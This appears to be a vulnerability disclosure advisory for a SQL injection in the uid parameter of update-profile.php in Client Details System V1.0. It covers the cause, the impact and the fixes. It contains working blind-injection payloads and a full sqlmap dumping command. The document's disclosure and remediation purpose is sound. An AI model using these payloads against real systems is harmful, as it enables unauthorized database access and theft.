Client Details System V1.0 update-profile.php SQL injection

[hellonewbie]

NAME OF AFFECTED PRODUCT(S)

• Client Details System

Vendor Homepage

• [Client Details System In PHP With Source Code - Source Code & Projects](https://code-projects.org/client-details-system-in-php-with-source-code/)

AFFECTED AND/OR FIXED VERSION(S)

submitter

• LiuJiying

VERSION(S)

• V1.0

Software Link

• [Client Details System In PHP With Source Code - Source Code & Projects](https://code-projects.org/client-details-system-in-php-with-source-code/)

PROBLEM TYPE

Vulnerability Type

• SQL injection

Root Cause

• The root cause of the vulnerability is the improper construction of an SQL UPDATE query in the update-profile.php script. The application directly concatenates the raw, unsanitized uid parameter, received from a $_GET request, into the SQL query string. This fails to neutralize special characters or SQL operators, allowing user-supplied input to be executed as part of the database command. The core issue is the absence of server-side input validation and the failure to use parameterized queries (prepared statements), which would safely separate SQL logic from user data.

Impact

The impact of this vulnerability is critical. An authenticated attacker, by manipulating the uid parameter in the URL, can execute arbitrary SQL commands with the privileges of the web application's database user. This can lead to:

• Unauthorized Data Manipulation: The attacker can bypass the intended business logic and update, insert, or delete arbitrary records across any table in the database. For example, using a payload like 1' OR '1'='1 , an attacker could modify every user's profile simultaneously.
• Complete Data Exfiltration: Sensitive information from the entire database can be stolen, including user credentials, personal identifiable information (PII), and other application data, using UNION -based or time-based blind injection techniques.
• Denial of Service (DoS): The vulnerability could be used to execute resource-intensive or destructive queries (e.g., DROP TABLE if stacked queries are enabled), potentially rendering the database or the entire application unavailable.
• Full System Compromise: Depending on the database server's configuration and privileges, this flaw could be escalated to achieve remote code execution (RCE) on the underlying server, leading to a complete system takeover.

DESCRIPTION

The "Update Profile" feature within the admin panel is critically vulnerable to SQL Injection. The uid GET parameter, which is intended to specify the unique identifier of the user profile to be modified, is not subjected to any sanitization or validation and is directly embedded into the UPDATE statement. This allows an authenticated attacker to inject malicious SQL code by crafting a malicious uid value in the request URL.

Need login or authorization

Vulnerability details and POC

Vulnerability type:

• boolean-based blind
• time-based blind

Vulnerability location:

• 'uid' parameter

Payload:

---

Parameter: uid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: uid=1' OR NOT 3664=3664 AND 'wMtd'='wMtd

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uid=1' AND (SELECT 4745 FROM (SELECT(SLEEP(5)))ytgU) AND 'ZNhO'='ZNhO

---

## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:

└─# sqlmap -u "http://localhost/clientdetails/admin/update-profile.php?uid=1" --cookie "PHPSESSID=mjnk939utanl0bo2d5fu94i8bj" --data "Submit=1&fname=a&lname=b&contact=1" -p uid --risk=3 --level=5 --dbms=mysql --technique=BEUST --tamper=space2comment,between,randomcase --batch --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.3#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:51:28 /2025-10-09/

Attack results

# Suggested repair

1. Immediately Adopt Parameterized Queries (Eliminate SQL Concatenation)

This is the most fundamental and effective method for fixing SQL injection vulnerabilities. Parameterized queries completely separate the SQL command (code) from user input (data), ensuring that the database engine will not misinterpret user data as executable SQL commands.

2. Strengthen Input Validation and Type Casting

• Numeric Validation : For inputs expected to be numbers (like an id ), cast them to integers.

$uid = (int)$_GET['uid'];
if ($uid <= 0) {
    // Handle the case of an invalid ID
    die("Invalid ID specified.");
}

• Format Validation : For data with specific formats like email addresses or phone numbers, use regular expressions or filter_var() for validation.

$email = filter_var($_POST['uemail'], FILTER_VALIDATE_EMAIL);
if ($email === false) {
    die("Invalid email format.");
}

• Whitelist Validation : If an input value should only be selected from a fixed set (like a dropdown menu), ensure the submitted value is one of the valid options.

3. Enforce the Principle of Least Privilege (PoLP) on the Database User

Recommendation: Configure the MySQL user account that the PHP application uses to have the minimum set of permissions required for its operation. This is a crucial defense-in-depth measure. If an SQL injection vulnerability were to be exploited, this principle would limit the potential damage. For example, the application's user should only have SELECT , INSERT , and UPDATE permissions on the specific tables it needs to interact with. It should not have administrative privileges like DROP , ALTER , FILE , or access to other databases on the server.